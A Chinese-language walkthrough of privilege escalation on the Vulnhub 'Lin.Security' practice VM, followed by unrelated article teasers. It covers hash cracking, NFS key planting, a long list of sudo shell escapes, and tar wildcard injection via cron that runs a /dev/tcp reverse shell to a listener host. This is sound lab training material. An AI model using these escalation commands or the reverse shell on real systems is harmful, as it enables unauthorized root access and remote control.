[vulnhub]Lin.Security主机Linux提权

news2024/11/24 2:15:08

Hash Crack(Hash cat)

bob@linsecurity:~$ cat /etc/passwd

image-2.png

$ echo "AzER3pBZh6WZE">hash

检查哈希类型:

$ hash-identifier AzER3pBZh6WZE

image-3.png

$ hashcat -m 1500 -a 0 hash /usr/share/wordlists/rockyou.txt --force

image-4.png

username:insecurity
password:AzER3pBZh6WZE:P@ssw0rd

image-5.png

NFS

$ showmount -e 192.168.8.104

Export list for 192.168.8.104:
/home/peter *

挂载到peter

获取关于peter的信息

image-6.png

peter的UDI是1001

$ sudo mkdir /mnt/lin_peter
$ sudo adduser -u 1001 peter

创建用户peter.

image-7.png

$ sudo mount 192.168.8.104:/home/peter /mnt/lin_peter -o vers=3

$ sudo ls /mnt/lin_peter -la

$ su peter

(peter)$ ssh-keygen -t ssh-rsa
(peter)$ mkdir /mnt/lin_peter/.ssh/
(peter)$ cp ~/.ssh/id_rsa.pub /mnt/lin_peter/.ssh/authorized_keys

image-8.png

(peter)$ ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i ~/.ssh/id_rsa peter@192.168.8.104

image-9.png

Root

修改NFS的共享文件夹

peter@linsecurity:~$ cat /etc/exports

image-10.png

image-11.png

发现关于strace权限提升

image-12.png.

$ sudo strace -o /dev/null /bin/sh

image-13.png

Sudo

bob@linsecurity:~$ sudo -l

image-15.png

Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp, /usr/bin/less,
        /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl, /usr/bin/tclsh,
        /usr/bin/git, /usr/bin/script, /usr/bin/scp

ash

ash(Almquist Shell)是一个轻量级、高效的 Unix/Linux 命令行解释器,常用于嵌入式系统和资源受限的环境中。

$ sudo ash

awk

awk 是一个用于在 Unix/Linux 系统中进行模式匹配和文本处理的强大工具和编程语言。

sudo awk 'BEGIN {system("/bin/sh")}'

bash

bash 是一个广泛使用的 Unix/Linux 命令行解释器和脚本语言,提供强大的交互和自动化功能。

sudo /bin/bash

csh

csh 是一种基于 C 语言语法的 Unix 命令行解释器,提供丰富的编程功能和用户交互特性。

sudo csh

dash

dash 是一个轻量级且符合 POSIX 标准的 Unix/Linux 命令行解释器,专为快速执行脚本而设计。

sudo dash

ed

ed是一个基于命令行的行编辑器,用于在Unix和类Unix系统中进行基本的文本编辑操作。

sudo ed
!/bin/sh

env

env是一个用于显示或设置环境变量的命令行工具,在Unix和类Unix系统中被广泛使用。

sudo env /bin/sh

expect

expect是一种用于编写和执行交互式脚本的自动化工具,常用于模拟人类用户与命令行程序或脚本的交互过程。

sudo expect -c 'spawn /bin/sh;interact'

find

find是一个用于在文件系统中搜索文件和目录的命令行工具,支持多种搜索条件和操作。

sudo find . -exec /bin/sh \; -quit

ftp

ftp是一种用于在计算机之间传输文件的标准网络协议和命令行工具,支持文件传输、目录操作、权限设置等功能。

sudo ftp
!/bin/sh

less

less是一个命令行文本查看器,用于分页显示文本文件内容,并支持搜索、导航等功能,适用于查看大型文本文件。

sudo less /etc/profile
!/bin/sh

git

git是一个分布式版本控制系统,用于跟踪文件的更改并协调多人协作开发项目,提供了版本控制、分支管理、远程仓库等功能。

A

这会调用默认的分页器,通常是less,其他功能可能也适用。

sudo git -p help config
!/bin/sh

B

帮助系统也可以从任何 git 命令中访问,例如 git branch。这会调用默认的分页器,通常是 less,其他功能可能也适用。

sudo git branch --help config
!/bin/sh

C

Git钩子仅仅是shell脚本,在下面的示例中,使用了与预提交动作相关联的钩子。任何其他的钩子也可以工作,只需确保能够执行适当的操作来触发它。现有的存储库也可以使用,并且进入该目录也可以,即,可以不使用 -C 选项。

TF=$(mktemp -d)
ln -s /bin/sh "$TF/git-x"
sudo git "--exec-path=$TF" x

man

man是一个命令行工具,用于查看Unix和类Unix系统中命令、函数和配置文件等的详细手册页,提供了丰富的帮助信息和文档阅读功能。

sudo man man
!/bin/sh

more

more是一个命令行工具,用于逐页显示文本文件内容,支持基本的浏览和搜索操作,适用于查看较小的文本文件。

TERM= sudo more /etc/profile
!/bin/sh

scp

scp是基于SSH协议的文件传输工具,用于在Unix和类Unix系统之间安全地传输文件,支持加密传输、远程复制、文件权限保持等功能。

TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

socat

socat是一个用于在Unix系统中建立双向数据流连接的网络工具,支持各种类
型的连接、数据传输、代理功能等。

sudo socat stdin exec:/bin/sh

ssh

ssh是一种安全的远程登录和数据传输协议,提供了加密通信、身份验证、端口转发等功能,用于在计算机之间建立安全的连接和传输数据。

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

vi

vi是一款在Unix和类Unix系统中常用的文本编辑器,具有模式切换、编辑操作、命令执行等功能,适用于在终端环境下进行文本编辑。

sudo vi -c ':!/bin/sh' /dev/null

zsh

zsh是一种功能强大的命令行解释器,具有丰富的特性和高度的可定制性,提供了智能补全、历史命令管理、多种主题样式等功能,适用于提高命令行操作效率和舒适度。

sudo zsh

pico

pico是一个简单易用的文本编辑器,提供了基本的编辑功能,适用于在终端环境下进行简单的文本编辑任务。

sudo pico
^R^X
reset; sh 1>&0 2>&0

rvim

rvim可能是Vim编辑器的简化版本,提供了简化的功能和基本的编辑功能,适用于初学者或需要快速编辑文件的场景。

A

This requires that rvim is compiled with Python support. Prepend :py3 for Python 3.

sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

B

This requires that rvim is compiled with Lua support.

sudo rvim -c ':lua os.execute("reset; exec sh")'

perl

Perl是一种通用的脚本编程语言,具有强大的文本处理能力和广泛的应用领域,适用于各种编程任务和场景。

sudo perl -e 'exec "/bin/sh";'

tclsh

tclsh是Tcl的解释器,提供了一个交互式的环境,用于执行Tcl语句和脚本。

sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

script

script命令用于记录和保存当前终端会话的所有输入和输出内容到一个文件中。

sudo script -q /dev/null

crontab

查看机器定时任务

image-18.png

image-19.png

在目录/home/bob创建文件,进行命令参数注入

image-20.png

$ echo "" > --checkpoint=1
$ echo '/bin/bash -i >& /dev/tcp/192.168.8.103/10032 0>&1'>reverse.sh
$ chmod +x reverse.sh
echo "" > "--checkpoint-action=exec=sh reverse.sh"

等待几分钟即可获得反向shell

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1806505.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

TransformerFAM:革新深度学习的新型注意力机制

深度学习领域的一项突破性技术——Transformer架构&#xff0c;已经彻底改变了我们处理序列数据的方式。然而&#xff0c;Transformer在处理长序列数据时面临的二次复杂度问题&#xff0c;限制了其在某些应用场景下的潜力。针对这一挑战&#xff0c;研究者们提出了一种名为Tran…

sqlmap直接嗦 dnslog注入 sqllibs第8关

dnslog注入是解决注入的时候没有回显的情况&#xff0c;通过dns外带来进行得到我们想要的数据。 我们是用了dns解析的时候会留下记录&#xff0c;这时候就可以看见我们想要的内容。 这个时候我们还要了解unc路径以及一个函数load_file()以及concat来进行注入。看看我的笔记 unc…

每日5题Day19 - LeetCode 91 - 95

每一步向前都是向自己的梦想更近一步&#xff0c;坚持不懈&#xff0c;勇往直前&#xff01; 第一题&#xff1a;91. 解码方法 - 力扣&#xff08;LeetCode&#xff09; class Solution {public int numDecodings(String s) {int n s.length();//注意我们dp的范围是n1int[] d…

解决PyQt5中柱状图上显示的数值为带e的科学计数法

PyQt5生成柱状图的代码参考&#xff1a;PyQt5 QtChart-柱状图 参照上述文章&#xff0c;生成柱状图后&#xff0c;数值较大或较小情况下会导致柱状图上显示数值为带e的科学计数法&#xff0c;这样会影响数值的识别&#xff1a; 经过分析QBarSet方法得到解决方法&#xff1a;需…

车载电子电气架构 --- 车载信息安全

我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 屏蔽力是信息过载时代一个人的特殊竞争力,任何消耗你的人和事,多看一眼都是你的不对。非必要不费力证明自己,无利益不试图说服别人,是精神上的节…

先进封装技术的一些优缺点探讨

半导体封装技术是半导体制造过程中的关键环节&#xff0c;它不仅保护了芯片免受物理损伤&#xff0c;还提供了电气连接和散热功能。随着技术的发展&#xff0c;出现了多种先进的封装技术&#xff0c;每种技术都有其特定的应用场景和优缺点。 --> 1. 传统封装技术 【优点】&…

memory动态内存管理学习之unique_ptr

此头文件是动态内存管理库的一部分。std::unique_ptr 是一种智能指针&#xff0c;它通过指针持有并管理另一对象&#xff0c;并在 unique_ptr 离开作用域时释放该对象。在发生下列两者之一时&#xff0c;用关联的删除器释放对象&#xff1a; 管理它的 unique_ptr 对象被销毁。…

五款软件推荐:U盘数据不小心删除了?帮你快速找回!

U盘数据不小心删除了怎么恢复&#xff1f;U盘是一种便携式存储设备&#xff0c;因其小巧轻便而广受欢迎。但是&#xff0c;U盘也常常会遇到数据丢失的问题。当U盘数据丢失时&#xff0c;需要找到一款可靠的数据恢复软件来恢复数据。 接下来为大家推荐5款好用的免费U盘数据恢复软…

SmartDraw Suite Edition 画图软件画表格内存示意图的使用方法

总述&#xff1a;遇到不会画的&#xff0c;比如如何画一条虚线&#xff0c;先将 虚线 翻译成英文&#xff0c;然后在 help 中查询。 新建的时候选择如下&#xff1a; 一、选择 Forms->Blank Form 二、画表格&#xff1a; 三、画箭头&#xff1a;先选择1在选择2 四、编辑文…

基于睡眠声音评估睡眠质量

随着健康意识的增强&#xff0c;人们越来越关注睡眠质量。确保获得充足的高质量睡眠对于维持身体健康和心理平衡至关重要。专业的睡眠状态测量主要通过多导睡眠图&#xff08;PSG&#xff09;进行。然而&#xff0c;PSG会给受试者带来显著的身体负担&#xff0c;并且在没有专业…

力扣hot100学习记录(十二)

94. 二叉树的中序遍历 给定一个二叉树的根节点 root&#xff0c;返回它的中序遍历。 题意 给定一个二叉树&#xff0c;返回它的中序遍历 思路 采用递归的思想&#xff0c;只要根节点不为空&#xff0c;则一直递归遍历左子树&#xff0c;然后将根节点的值存入结果&#xff0c;…

深度学习中几种常见数据标准化方法

目录 一、介绍 二、总结 三、详情 1. StandardScaler 2. MinMaxScaler 3. RobustScaler 4. MaxAbsScaler 5. Normalizer 6. QuantileTransformer 7. PowerTransformer 8. Log Transform 四、示例 五、心得 一、介绍 方法名称缩放范围适用条件StandardScaler均值…

山水有相逢 来日皆可期

毕业接踵而至&#xff0c;大家都在拍照记录留恋毕业的美好时光碎片。但由于最近实在“玩得太嗨”&#xff0c;无心拍毕业照。 默海笑&#xff0c;当然是需要用自己的方式来为这浑浑噩噩的大学生活画上句号。 我相信&#xff0c;毕业时的你我都会无比的感慨&#xff0c;为什么时…

Matlab|遗传粒子群-混沌粒子群-基本粒子群

目录 1 主要内容 2 部分代码 3 效果图 4 下载链接 1 主要内容 很多同学在发文章时候最犯愁的就是创新点创新点创新点&#xff08;重要的事情说三遍&#xff09;&#xff0c;对于采用智能算法的模型&#xff0c;可以采用算法改进的方式来达到提高整个文章创新水平的目的&…

Autosar 通讯栈配置-手动配置PDU及Signal-基于ETAS软件

文章目录 前言System配置ISignalSystem SignalPduFrameISignal到System Signal的mapSystem Signal到Pdu的mapPdu到Frame的mapSignal配置Can配置CanHwFilterEcuC配置PduR配置CanIf配置CanIfInitCfgCanIfRxPduCfgCom配置ComIPduComISignalSWC配置Data mappingRTE接口Com配置补充总…

AXI Quad SPI IP核中的STARTUPEn原语参数

启动STARTUPEn Primitive &#xff08;原语&#xff09;参数在 FPGA的主 SPI模式下非常有用。当你启用这个参数时&#xff0c;对于 7 系列设备&#xff0c;STARTUPE2 原语会被包含在设计中&#xff1b;而对于 UltraScale™ 设备&#xff0c;则是 STARTUPE3 原语。这些原语在 FP…

时隔很久运行苍穹外卖项目,出现很多错误

中途运行了很多其他项目&#xff0c;maven的配置文件还被我修改了一次。导致再次运行苍穹外卖项目出现很多错误。 发现没有办法&#xff0c;把本地的仓库删了个干干净净。然后点击clean发现报错&#xff1a; Cannot access alimaven (http://mavejavascript:void(0);n.aliyun.…

线性代数|机器学习-P11方程Ax=b求解研究

文章目录 1. 变量数和约束条件数大小分类2. 最小二乘法和Gram-schmidt变换2.1 Gram-schmidt变换2.2 最小二乘法2.2.1 损失函数-Lasso 和regression2.2.2 损失函数-Lasso2.2.3 损失函数-regression2.2.4 Regression岭回归-矩阵验证2.2.5 Regression岭回归-导数验证 3. 迭代和随机…

牛客网刷题 | BC119 最高分与最低分之差

目前主要分为三个专栏&#xff0c;后续还会添加&#xff1a; 专栏如下&#xff1a; C语言刷题解析 C语言系列文章 我的成长经历 感谢阅读&#xff01; 初来乍到&#xff0c;如有错误请指出&#xff0c;感谢&#xff01; 描述 输入n个成绩&#…

STM32F103C8T6 HAL库串口重定向

前言&#xff1a; 这里仅用做个人记录&#xff0c;实现USART1串口通信&#xff0c;并通过printf重定向输出“串口打印测试” 正文开始&#xff1a; 首先在STM32CubeMX上对串口进行配置&#xff0c;其实方法也非常简单。 按照箭头顺序&#xff0c;先点击Connectivity找到USART1…